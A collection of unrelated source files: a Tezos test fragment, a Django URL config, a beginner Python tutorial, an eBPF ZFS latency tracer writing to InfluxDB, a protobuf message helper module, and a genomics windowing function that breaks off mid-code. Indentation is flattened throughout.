decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
from django.urls import path
from .views import ContactsView, HomeView
urlpatterns = [
path('', HomeView.as_view(), name='home'),
path('contacts/', ContactsView.as_view(), name='contacts')
]
|
# conditional tests
car = 'bmw' # assignment operator
car == 'bmw' # relational operator
# ignoring case when making a comparison
car = 'Audi'
car.lower() == 'audi' # True
# checking for inequality
topping = 'mushrooms'
topping != 'anchovies' # True
# numerical comparison
age = 18
age == 18 # True
age != 18 # False
# comparison operator
age = 19
age < 21 # True
age <= 21 # True
age > 21 # False
age >= 21 #False
# checking for multiple conditions
age_0 = 22
age_1 = 18
# using and to check
age_0 >= 21 and age_1 >= 21 # False
age_1 = 23
age_0 >= 21 and age_1 >= 21 # True
# using or to check multiple conditions
age_0 = 22
age_1 = 18
age_0 >= 21 or age_1 >= 21 # True
age_0 = 18
age_0 >= 21 or age_1 >= 21 # False
# boolean values
# simple boolean values
game_active = True
can_edit = False
# if statements
# simple if statements
age = 19
if age >= 18:
print("You are eligible to vote!")
# if-else ladder statement
age = 12
if age < 4:
price = 0
elif age < 18:
price = 5
else:
price = 10
print("Your cose is $" + str(price) + ".")
# condition testing with list
players = ['al', 'bey', 'cyn', 'date']
if 'al' in players:
print(True)
if 'eric' in players:
print(True)
else:
print(False)
# conditional tests with lists (cont.)
banned_users = ['ann', 'chad', 'dee']
user = 'erin'
if user not in banned_users:
print("You can play!")
# checking if a list is empty
players = []
if players:
for player in players:
print("player: " + player.title())
else:
print("We have no players yet!")
age = input("How old are you ? ")
age = int(age)
if age >= 18:
print("\nYou can vote!")
else:
print("\nSorry you can't vote!")
# while loops:
current_number = 1
while current_number <= 5:
print(current_number)
current_number += 1
# letting users choose when to quit
prompt = "\nTell me something, and I'll"
prompt += "repeat it back to you."
prompt += "\nEnter 'quit' to end the program."
message = ""
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
# using a flag
prompt = "\nTell me something, and I'll "
prompt += "repeat it back to you. "
prompt += "\n Enter 'quit' to end the program. "
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
# breaking out of loops
"""You can use the break statement and the continue,
statement with any of Python's loops.
For example you can use break to quit a for loop that's working through a list or a dictionary.
You can use continue to skip over certain items when looping through a list or dictionary as well.
"""
# using continue in a loop
banned_users = ['eve', 'fred', 'gary', 'helen']
prompt = "\nAdd a player to your team."
prompt += "\n Enter 'quit' when you'are done."
players = []
while True:
player = input(prompt)
if player == 'quit':
break
elif player in banned_users:
print(player + " is banned!")
continue
else:
players.append(player)
print("\nYour team: ")
for player in players:
print(player)
# avoiding infinite loops
#while True:
# name = input("\nWho are you? ")
# print("Nice to meet you, " + name + "!")
# removing all instances of a value from a list
pets = ['dog', 'cat', 'dog', 'fish', 'cat', 'rabbit', 'cat']
print(pets)
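# One common way to finish the example the comment above describes
# (a sketch; the target value 'cat' is just illustrative):
while 'cat' in pets:
    pets.remove('cat')
print(pets)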
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @lint-avoid-python-3-compatibility-imports
#
# zfsdist Summarize ZFS operation latency.
# For Linux, uses BCC, eBPF.
#
# USAGE: zfsdist [-h] [-T] [-m] [-p PID] [interval] [count]
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 14-Feb-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from time import sleep, strftime
import argparse
import sys
sys.path.append('./plugins/common/')
from init_db import influx_client
from const import DatabaseType
from db_modules import write2db
from datetime import datetime
# arguments
examples = """examples:
./zfsdist # show operation latency as a histogram
./zfsdist -p 181 # trace PID 181 only
./zfsdist 1 10 # print 1 second summaries, 10 times
./zfsdist -m 5 # 5s summaries, milliseconds
"""
parser = argparse.ArgumentParser(
description="Summarize ZFS operation latency",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--notimestamp", action="store_true",
help="don't include timestamp on interval output")
parser.add_argument("-m", "--milliseconds", action="store_true",
help="output in milliseconds")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("interval", nargs="?",
help="output interval, in seconds")
parser.add_argument("count", nargs="?", default=99999999,
help="number of outputs")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
pid = args.pid
countdown = int(args.count)
if args.milliseconds:
factor = 1000000
label = "msecs"
else:
factor = 1000
label = "usecs"
if args.interval and int(args.interval) == 0:
print("ERROR: interval 0. Exiting.")
exit()
debug = 0
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/sched.h>
#define OP_NAME_LEN 8
typedef struct dist_key {
    char op[OP_NAME_LEN];
    u64 slot;
    u32 pid;
    char comm[TASK_COMM_LEN];
} dist_key_t;
BPF_HASH(start, u32);
BPF_HISTOGRAM(dist, dist_key_t);
BPF_PERF_OUTPUT(events);
// time operation
int trace_entry(struct pt_regs *ctx)
{
u64 pid_tgid = bpf_get_current_pid_tgid();
u32 pid = pid_tgid >> 32;
u32 tid = (u32)pid_tgid;
if (FILTER_PID)
return 0;
u64 ts = bpf_ktime_get_ns();
start.update(&tid, &ts);
return 0;
}
static int trace_return(struct pt_regs *ctx, const char *op)
{
struct dist_key data1={};
u64 *tsp;
u64 pid_tgid = bpf_get_current_pid_tgid();
u32 pid = pid_tgid >> 32;
u32 tid = (u32)pid_tgid;
// fetch timestamp and calculate delta
tsp = start.lookup(&tid);
if (tsp == 0) {
return 0; // missed start or filtered
}
u64 delta = (bpf_ktime_get_ns() - *tsp) / FACTOR;
// store as histogram
dist_key_t key = {.slot = bpf_log2l(delta)};
__builtin_memcpy(&key.op, op, sizeof(key.op));
dist.atomic_increment(key);
start.delete(&tid);
    data1.pid = pid;
    bpf_get_current_comm(&data1.comm, sizeof(data1.comm));
    data1.slot = key.slot;
    __builtin_memcpy(&data1.op, op, sizeof(data1.op));
    events.perf_submit(ctx, &data1, sizeof(data1));
return 0;
}
int trace_read_return(struct pt_regs *ctx)
{
char *op = "read";
return trace_return(ctx, op);
}
int trace_write_return(struct pt_regs *ctx)
{
char *op = "write";
return trace_return(ctx, op);
}
int trace_open_return(struct pt_regs *ctx)
{
char *op = "open";
return trace_return(ctx, op);
}
int trace_fsync_return(struct pt_regs *ctx)
{
char *op = "fsync";
return trace_return(ctx, op);
}
"""
# data structure from template
class lmp_data(object):
def __init__(self,a,b,c,d,e,f):
self.time = a
self.glob = b
self.pid = c
self.comm = d
self.op = e
self.slot = f
data_struct = {"measurement":'zfsdist',
"time":[],
"tags":['glob',],
"fields":['time','pid','comm','op','slot']}
bpf_text = bpf_text.replace('FACTOR', str(factor))
if args.pid:
bpf_text = bpf_text.replace('FILTER_PID', 'pid != %s' % pid)
else:
bpf_text = bpf_text.replace('FILTER_PID', '0')
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
# load BPF program
b = BPF(text=bpf_text)
# common file functions
if BPF.get_kprobe_functions(b'zpl_iter'):
b.attach_kprobe(event="zpl_iter_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_iter_write", fn_name="trace_entry")
elif BPF.get_kprobe_functions(b'zpl_aio'):
b.attach_kprobe(event="zpl_aio_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_aio_write", fn_name="trace_entry")
else:
b.attach_kprobe(event="zpl_read", fn_name="trace_entry")
b.attach_kprobe(event="zpl_write", fn_name="trace_entry")
b.attach_kprobe(event="zpl_open", fn_name="trace_entry")
b.attach_kprobe(event="zpl_fsync", fn_name="trace_entry")
if BPF.get_kprobe_functions(b'zpl_iter'):
b.attach_kretprobe(event="zpl_iter_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_iter_write", fn_name="trace_write_return")
elif BPF.get_kprobe_functions(b'zpl_aio'):
b.attach_kretprobe(event="zpl_aio_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_aio_write", fn_name="trace_write_return")
else:
b.attach_kretprobe(event="zpl_read", fn_name="trace_read_return")
b.attach_kretprobe(event="zpl_write", fn_name="trace_write_return")
b.attach_kretprobe(event="zpl_open", fn_name="trace_open_return")
b.attach_kretprobe(event="zpl_fsync", fn_name="trace_fsync_return")
print("Tracing ZFS operation latency... Hit Ctrl-C to end.")
# process event
def print_event(cpu, data, size):
event = b["events"].event(data)
    test_data = lmp_data(datetime.now().isoformat(), 'glob', event.pid, event.comm.decode('utf-8', 'replace'), event.op.decode('utf-8', 'replace'), event.slot)
write2db(data_struct, test_data, influx_client, DatabaseType.INFLUXDB.value)
# print(("%s Triggered by PID %d (\"%s\"), OOM kill of PID %d (\"%s\")"
# ", %d pages, loadavg: %s") % (strftime("%H:%M:%S"), event.fpid,
# event.fcomm.decode('utf-8', 'replace'), event.tpid,
# event.tcomm.decode('utf-8', 'replace'), event.pages, avgline))
# open a perf ring buffer on the BPF program loaded above
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains helper functions used to create protocol message classes from
Descriptor objects at runtime backed by the protocol buffer C++ API.
"""
__author__ = 'petar@google.com (Petar Petrov)'
import copy_reg
import operator
from google.protobuf.internal import _net_proto2___python
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import message
_LABEL_REPEATED = _net_proto2___python.LABEL_REPEATED
_LABEL_OPTIONAL = _net_proto2___python.LABEL_OPTIONAL
_CPPTYPE_MESSAGE = _net_proto2___python.CPPTYPE_MESSAGE
_TYPE_MESSAGE = _net_proto2___python.TYPE_MESSAGE
def GetDescriptorPool():
"""Creates a new DescriptorPool C++ object."""
return _net_proto2___python.NewCDescriptorPool()
_pool = GetDescriptorPool()
def GetFieldDescriptor(full_field_name):
"""Searches for a field descriptor given a full field name."""
return _pool.FindFieldByName(full_field_name)
def BuildFile(content):
"""Registers a new proto file in the underlying C++ descriptor pool."""
_net_proto2___python.BuildFile(content)
def GetExtensionDescriptor(full_extension_name):
"""Searches for extension descriptor given a full field name."""
return _pool.FindExtensionByName(full_extension_name)
def NewCMessage(full_message_name):
"""Creates a new C++ protocol message by its name."""
return _net_proto2___python.NewCMessage(full_message_name)
def ScalarProperty(cdescriptor):
"""Returns a scalar property for the given descriptor."""
def Getter(self):
return self._cmsg.GetScalar(cdescriptor)
def Setter(self, value):
self._cmsg.SetScalar(cdescriptor, value)
return property(Getter, Setter)
def CompositeProperty(cdescriptor, message_type):
"""Returns a Python property the given composite field."""
def Getter(self):
sub_message = self._composite_fields.get(cdescriptor.name, None)
if sub_message is None:
cmessage = self._cmsg.NewSubMessage(cdescriptor)
sub_message = message_type._concrete_class(__cmessage=cmessage)
self._composite_fields[cdescriptor.name] = sub_message
return sub_message
return property(Getter)
class RepeatedScalarContainer(object):
"""Container for repeated scalar fields."""
__slots__ = ['_message', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor):
self._message = msg
self._cmsg = msg._cmsg
self._cfield_descriptor = cfield_descriptor
def append(self, value):
self._cmsg.AddRepeatedScalar(
self._cfield_descriptor, value)
def extend(self, sequence):
for element in sequence:
self.append(element)
def insert(self, key, value):
values = self[slice(None, None, None)]
values.insert(key, value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def remove(self, value):
values = self[slice(None, None, None)]
values.remove(value)
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __setitem__(self, key, value):
values = self[slice(None, None, None)]
values[key] = value
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor, values)
def __getitem__(self, key):
return self._cmsg.GetRepeatedScalar(self._cfield_descriptor, key)
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(self._cfield_descriptor, key)
def __len__(self):
return len(self[slice(None, None, None)])
def __eq__(self, other):
if self is other:
return True
if not operator.isSequenceType(other):
raise TypeError(
'Can only compare repeated scalar fields against sequences.')
# We are presumably comparing against some other sequence type.
return other == self[slice(None, None, None)]
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, *args, **kwargs):
# Maintain compatibility with the previous interface.
if 'sort_function' in kwargs:
kwargs['cmp'] = kwargs.pop('sort_function')
self._cmsg.AssignRepeatedScalar(self._cfield_descriptor,
sorted(self, *args, **kwargs))
def RepeatedScalarProperty(cdescriptor):
"""Returns a Python property the given repeated scalar field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedScalarContainer(self, cdescriptor)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class RepeatedCompositeContainer(object):
"""Container for repeated composite fields."""
__slots__ = ['_message', '_subclass', '_cfield_descriptor', '_cmsg']
def __init__(self, msg, cfield_descriptor, subclass):
self._message = msg
self._cmsg = msg._cmsg
self._subclass = subclass
self._cfield_descriptor = cfield_descriptor
def add(self, **kwargs):
cmessage = self._cmsg.AddMessage(self._cfield_descriptor)
return self._subclass(__cmessage=cmessage, __owner=self._message, **kwargs)
def extend(self, elem_seq):
"""Extends by appending the given sequence of elements of the same type
as this one, copying each individual message.
"""
for message in elem_seq:
self.add().MergeFrom(message)
def remove(self, value):
# TODO(protocol-devel): This is inefficient as it needs to generate a
# message pointer for each message only to do index(). Move this to a C++
# extension function.
self.__delitem__(self[slice(None, None, None)].index(value))
def MergeFrom(self, other):
for message in other[:]:
self.add().MergeFrom(message)
def __getitem__(self, key):
cmessages = self._cmsg.GetRepeatedMessage(
self._cfield_descriptor, key)
subclass = self._subclass
if not isinstance(cmessages, list):
return subclass(__cmessage=cmessages, __owner=self._message)
return [subclass(__cmessage=m, __owner=self._message) for m in cmessages]
def __delitem__(self, key):
self._cmsg.DeleteRepeatedField(
self._cfield_descriptor, key)
def __len__(self):
return self._cmsg.FieldLength(self._cfield_descriptor)
def __eq__(self, other):
"""Compares the current instance with another one."""
if self is other:
return True
if not isinstance(other, self.__class__):
raise TypeError('Can only compare repeated composite fields against '
'other repeated composite fields.')
messages = self[slice(None, None, None)]
other_messages = other[slice(None, None, None)]
return messages == other_messages
def __hash__(self):
raise TypeError('unhashable object')
def sort(self, cmp=None, key=None, reverse=False, **kwargs):
# Maintain compatibility with the old interface.
if cmp is None and 'sort_function' in kwargs:
cmp = kwargs.pop('sort_function')
# The cmp function, if provided, is passed the results of the key function,
# so we only need to wrap one of them.
if key is None:
index_key = self.__getitem__
else:
index_key = lambda i: key(self[i])
# Sort the list of current indexes by the underlying object.
indexes = range(len(self))
indexes.sort(cmp=cmp, key=index_key, reverse=reverse)
# Apply the transposition.
for dest, src in enumerate(indexes):
if dest == src:
continue
self._cmsg.SwapRepeatedFieldElements(self._cfield_descriptor, dest, src)
# Don't swap the same value twice.
indexes[src] = src
def RepeatedCompositeProperty(cdescriptor, message_type):
"""Returns a Python property for the given repeated composite field."""
def Getter(self):
container = self._composite_fields.get(cdescriptor.name, None)
if container is None:
container = RepeatedCompositeContainer(
self, cdescriptor, message_type._concrete_class)
self._composite_fields[cdescriptor.name] = container
return container
def Setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % cdescriptor.name)
doc = 'Magic attribute generated for "%s" proto field.' % cdescriptor.name
return property(Getter, Setter, doc=doc)
class ExtensionDict(object):
"""Extension dictionary added to each protocol message."""
def __init__(self, msg):
self._message = msg
self._cmsg = msg._cmsg
self._values = {}
def __setitem__(self, extension, value):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_OPTIONAL or
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
raise TypeError('Extension %r is repeated and/or a composite type.' % (
extension.full_name,))
self._cmsg.SetScalar(cdescriptor, value)
self._values[extension] = value
def __getitem__(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type != _CPPTYPE_MESSAGE):
return self._cmsg.GetScalar(cdescriptor)
ext = self._values.get(extension, None)
if ext is not None:
return ext
ext = self._CreateNewHandle(extension)
self._values[extension] = ext
return ext
def ClearExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
self._cmsg.ClearFieldByDescriptor(extension._cdescriptor)
if extension in self._values:
del self._values[extension]
def HasExtension(self, extension):
from google.protobuf import descriptor
if not isinstance(extension, descriptor.FieldDescriptor):
raise KeyError('Bad extension %r.' % (extension,))
return self._cmsg.HasFieldByDescriptor(extension._cdescriptor)
def _FindExtensionByName(self, name):
"""Tries to find a known extension with the specified name.
Args:
name: Extension full name.
Returns:
Extension field descriptor.
"""
return self._message._extensions_by_name.get(name, None)
def _CreateNewHandle(self, extension):
cdescriptor = extension._cdescriptor
if (cdescriptor.label != _LABEL_REPEATED and
cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
cmessage = self._cmsg.NewSubMessage(cdescriptor)
return extension.message_type._concrete_class(__cmessage=cmessage)
if cdescriptor.label == _LABEL_REPEATED:
if cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
return RepeatedCompositeContainer(
self._message, cdescriptor, extension.message_type._concrete_class)
else:
return RepeatedScalarContainer(self._message, cdescriptor)
# This shouldn't happen!
assert False
return None
def NewMessage(bases, message_descriptor, dictionary):
"""Creates a new protocol message *class*."""
_AddClassAttributesForNestedExtensions(message_descriptor, dictionary)
_AddEnumValues(message_descriptor, dictionary)
_AddDescriptors(message_descriptor, dictionary)
return bases
def InitMessage(message_descriptor, cls):
"""Constructs a new message instance (called before instance's __init__)."""
cls._extensions_by_name = {}
_AddInitMethod(message_descriptor, cls)
_AddMessageMethods(message_descriptor, cls)
_AddPropertiesForExtensions(message_descriptor, cls)
copy_reg.pickle(cls, lambda obj: (cls, (), obj.__getstate__()))
def _AddDescriptors(message_descriptor, dictionary):
"""Sets up a new protocol message class dictionary.
Args:
message_descriptor: A Descriptor instance describing this message type.
dictionary: Class dictionary to which we'll add a '__slots__' entry.
"""
dictionary['__descriptors'] = {}
for field in message_descriptor.fields:
dictionary['__descriptors'][field.name] = GetFieldDescriptor(
field.full_name)
dictionary['__slots__'] = list(dictionary['__descriptors'].iterkeys()) + [
'_cmsg', '_owner', '_composite_fields', 'Extensions', '_HACK_REFCOUNTS']
def _AddEnumValues(message_descriptor, dictionary):
"""Sets class-level attributes for all enum fields defined in this message.
Args:
message_descriptor: Descriptor object for this message type.
dictionary: Class dictionary that should be populated.
"""
for enum_type in message_descriptor.enum_types:
dictionary[enum_type.name] = enum_type_wrapper.EnumTypeWrapper(enum_type)
for enum_value in enum_type.values:
dictionary[enum_value.name] = enum_value.number
def _AddClassAttributesForNestedExtensions(message_descriptor, dictionary):
"""Adds class attributes for the nested extensions."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.iteritems():
assert extension_name not in dictionary
dictionary[extension_name] = extension_field
def _AddInitMethod(message_descriptor, cls):
"""Adds an __init__ method to cls."""
# Create and attach message field properties to the message class.
# This can be done just once per message class, since property setters and
# getters are passed the message instance.
# This makes message instantiation extremely fast, and at the same time it
# doesn't require the creation of property objects for each message instance,
# which saves a lot of memory.
for field in message_descriptor.fields:
field_cdescriptor = cls.__descriptors[field.name]
if field.label == _LABEL_REPEATED:
if field.cpp_type == _CPPTYPE_MESSAGE:
value = RepeatedCompositeProperty(field_cdescriptor, field.message_type)
else:
value = RepeatedScalarProperty(field_cdescriptor)
elif field.cpp_type == _CPPTYPE_MESSAGE:
value = CompositeProperty(field_cdescriptor, field.message_type)
else:
value = ScalarProperty(field_cdescriptor)
setattr(cls, field.name, value)
# Attach a constant with the field number.
constant_name = field.name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, field.number)
def Init(self, **kwargs):
"""Message constructor."""
cmessage = kwargs.pop('__cmessage', None)
if cmessage:
self._cmsg = cmessage
else:
self._cmsg = NewCMessage(message_descriptor.full_name)
# Keep a reference to the owner, as the owner keeps a reference to the
# underlying protocol buffer message.
owner = kwargs.pop('__owner', None)
if owner:
self._owner = owner
if message_descriptor.is_extendable:
self.Extensions = ExtensionDict(self)
else:
# Reference counting in the C++ code is broken and depends on
# the Extensions reference to keep this object alive during unit
# tests (see b/4856052). Remove this once b/4945904 is fixed.
self._HACK_REFCOUNTS = self
self._composite_fields = {}
for field_name, field_value in kwargs.iteritems():
field_cdescriptor = self.__descriptors.get(field_name, None)
if not field_cdescriptor:
raise ValueError('Protocol message has no "%s" field.' % field_name)
if field_cdescriptor.label == _LABEL_REPEATED:
if field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
field_name = getattr(self, field_name)
for val in field_value:
field_name.add().MergeFrom(val)
else:
getattr(self, field_name).extend(field_value)
elif field_cdescriptor.cpp_type == _CPPTYPE_MESSAGE:
getattr(self, field_name).MergeFrom(field_value)
else:
setattr(self, field_name, field_value)
Init.__module__ = None
Init.__doc__ = None
cls.__init__ = Init
def _IsMessageSetExtension(field):
"""Checks if a field is a message set extension."""
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == _TYPE_MESSAGE and
field.message_type == field.extension_scope and
field.label == _LABEL_OPTIONAL)
def _AddMessageMethods(message_descriptor, cls):
"""Adds the methods to a protocol message class."""
if message_descriptor.is_extendable:
def ClearExtension(self, extension):
self.Extensions.ClearExtension(extension)
def HasExtension(self, extension):
return self.Extensions.HasExtension(extension)
def HasField(self, field_name):
return self._cmsg.HasField(field_name)
def ClearField(self, field_name):
child_cmessage = None
if field_name in self._composite_fields:
child_field = self._composite_fields[field_name]
del self._composite_fields[field_name]
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
child_cmessage = child_field._cmsg
if child_cmessage is not None:
self._cmsg.ClearField(field_name, child_cmessage)
else:
self._cmsg.ClearField(field_name)
def Clear(self):
cmessages_to_release = []
for field_name, child_field in self._composite_fields.iteritems():
child_cdescriptor = self.__descriptors[field_name]
# TODO(anuraag): Support clearing repeated message fields as well.
if (child_cdescriptor.label != _LABEL_REPEATED and
child_cdescriptor.cpp_type == _CPPTYPE_MESSAGE):
child_field._owner = None
cmessages_to_release.append((child_cdescriptor, child_field._cmsg))
self._composite_fields.clear()
self._cmsg.Clear(cmessages_to_release)
def IsInitialized(self, errors=None):
if self._cmsg.IsInitialized():
return True
if errors is not None:
errors.extend(self.FindInitializationErrors());
return False
def SerializeToString(self):
if not self.IsInitialized():
raise message.EncodeError(
'Message %s is missing required fields: %s' % (
self._cmsg.full_name, ','.join(self.FindInitializationErrors())))
return self._cmsg.SerializeToString()
def SerializePartialToString(self):
return self._cmsg.SerializePartialToString()
def ParseFromString(self, serialized):
self.Clear()
self.MergeFromString(serialized)
def MergeFromString(self, serialized):
byte_size = self._cmsg.MergeFromString(serialized)
if byte_size < 0:
raise message.DecodeError('Unable to merge from string.')
return byte_size
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
"expected %s got %s." % (cls.__name__, type(msg).__name__))
self._cmsg.MergeFrom(msg._cmsg)
def CopyFrom(self, msg):
self._cmsg.CopyFrom(msg._cmsg)
def ByteSize(self):
return self._cmsg.ByteSize()
def SetInParent(self):
return self._cmsg.SetInParent()
def ListFields(self):
all_fields = []
field_list = self._cmsg.ListFields()
fields_by_name = cls.DESCRIPTOR.fields_by_name
for is_extension, field_name in field_list:
if is_extension:
extension = cls._extensions_by_name[field_name]
all_fields.append((extension, self.Extensions[extension]))
else:
field_descriptor = fields_by_name[field_name]
all_fields.append(
(field_descriptor, getattr(self, field_name)))
all_fields.sort(key=lambda item: item[0].number)
return all_fields
def FindInitializationErrors(self):
return self._cmsg.FindInitializationErrors()
def __str__(self):
return str(self._cmsg)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, self.__class__):
return False
return self.ListFields() == other.ListFields()
def __ne__(self, other):
return not self == other
def __hash__(self):
raise TypeError('unhashable object')
def __unicode__(self):
# Lazy import to prevent circular import when text_format imports this file.
from google.protobuf import text_format
return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
# Attach the local methods to the message class.
for key, value in locals().copy().iteritems():
if key not in ('key', 'value', '__builtins__', '__name__', '__doc__'):
setattr(cls, key, value)
# Static methods:
def RegisterExtension(extension_handle):
extension_handle.containing_type = cls.DESCRIPTOR
cls._extensions_by_name[extension_handle.full_name] = extension_handle
if _IsMessageSetExtension(extension_handle):
# MessageSet extension. Also register under type name.
cls._extensions_by_name[
extension_handle.message_type.full_name] = extension_handle
cls.RegisterExtension = staticmethod(RegisterExtension)
def FromString(string):
msg = cls()
msg.MergeFromString(string)
return msg
cls.FromString = staticmethod(FromString)
def _AddPropertiesForExtensions(message_descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
extension_dict = message_descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.iteritems():
constant_name = extension_name.upper() + '_FIELD_NUMBER'
setattr(cls, constant_name, extension_field.number)
|
from functools import partial
import warnings
import numpy as np
import pandas as pd
import bioframe
from .lib.numutils import LazyToeplitz
def make_bin_aligned_windows(
binsize, chroms, centers_bp, flank_bp=0, region_start_bp=0, ignore_index=False
):
"""
Convert genomic loci into bin spans on a fixed bin-size segmentation of a
genomic region. Window limits are adjusted to align with bin edges.
Parameters
-----------
binsize : int
Bin size (resolution) in base pairs.
chroms : 1D array-like
Column of chromosome names.
centers_bp : 1D or nx2 array-like
If 1D, center points of each window. If 2D, the starts and ends.
flank_bp : int
Distance in base pairs to extend windows on either side.
region_start_bp : int, optional
If region is a subset of a chromosome, shift coordinates by this amount.
Default is 0.
Returns
-------
DataFrame with columns:
'chrom' - chromosome
'start', 'end' - window limits in base pairs
'lo', 'hi' - window limits in bins
"""
if not (flank_bp % binsize == 0):
raise ValueError("Flanking distance must be divisible by the bin size.")
if isinstance(chroms, pd.Series) and not ignore_index:
index = chroms.index
else:
index = None
chroms = np.asarray(chroms)
centers_bp = np.asarray(centers_bp)
if len(centers_bp.shape) == 2:
left_bp = centers_bp[:, 0]
right_bp = centers_bp[:, 1]
else:
left_bp = right_bp = centers_bp
if np.any(left_bp > right_bp):
raise ValueError("Found interval with end > start.")
left = left_bp - region_start_bp
right = right_bp - region_start_bp
left_bin = (left / binsize).astype(int)
right_bin = (right / binsize).astype(int)
flank_bin = flank_bp // binsize
lo = left_bin - flank_bin
hi = right_bin + flank_bin + 1
windows = pd.DataFrame(index=index)
windows["chrom"] = chroms
windows["start"] = lo * binsize
windows["end"] = hi * binsize
windows["lo"] = lo
windows["hi"] = hi
return windows
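# A minimal illustrative call (values are made up): 5 kb bins, one summit on
# chr1 at 1,234,567 bp, extended by 10 kb of flank on each side.
#
#   windows = make_bin_aligned_windows(
#       5000, ["chr1"], [1_234_567], flank_bp=10_000
#   )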
def assign_regions(features, supports):
    """
    Assign each feature (row) to one of the support regions, adding a
    'region' column formatted as 'chrom:start-end'. Features that fall
    outside every support are left unassigned (missing region).
    """
features = features.copy()
# on-diagonal features
if "chrom" in features.columns:
for i, region in enumerate(supports):
if len(region) == 3:
sel = features.chrom == region[0]
sel &= features.end >= region[1]
if region[2] is not None:
sel &= features.start < region[2]
features.loc[sel, "region"] = i
elif len(region) == 2:
region1, region2 = region
